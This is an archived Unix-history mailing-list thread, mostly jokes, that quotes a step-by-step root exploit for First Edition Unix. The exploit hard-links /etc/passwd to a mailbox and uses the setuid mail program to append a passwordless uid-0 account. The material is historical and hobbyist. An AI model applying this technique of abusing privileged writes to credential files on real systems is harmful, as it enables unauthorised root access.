[Unix-jun72] [TUHS] Some fun with 1st ed

Wilko Bulte wb at freebie.xs4all.nl
Sat May 3 15:29:43 EDT 2008


Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
> We need to send out a security alert immediately.  This is serious.

CERT to the rescue!  Man the barricades ! 

;-)

> On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> > All work and no play...
> > 
> > Here's a fun hack for first edition unix.  From MAIL (I) :
> > 
> >    When followed by the names of a letter and one or more people, the
> >    letter is appended to each person's mailbox.  Each letter is
> >    preceded by the sender's name and a postmark.
> > 
> >    A person is either the nameof an entry in the directory /usr, in
> >    which case the mail is sent to /usr/person/mailbox, or the path
> >    of a directory, in which case mailbox in that directory is used.
> > 
> > Mail is setuid root:
> > 
> > # ls -l /bin/mail
> >   80 surwr-  1 root   3940 Jan  1 00:00:00 mail
> > 
> > login as a non-root user (ie "bin"), create a file "letter" with the 
> > contents "hack::0:/:".  Run:
> > 
> >     @ ln /etc/passwd /tmp/mailbox
> >     @ mail letter /tmp
> > 
> > log out and log back in as "hack".  You are now root.  Cat /etc/passwd
> > and notice:
> > 
> >    From bin Jan  1 00:49:22
> >    hack::0:/:
> > 
> > clean up the file a little and enjoy your new elevated status.
> > 
> > Tim Newsham
> > http://www.thenewsh.com/~newsham/
> > _______________________________________________
> > TUHS mailing list
> > TUHS at minnie.tuhs.org
> > https://minnie.tuhs.org/mailman/listinfo/tuhs
> 
> -- 
> ---
> Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--- end of quoted text ---

-- 
Wilko



More information about the Unix-jun72 mailing list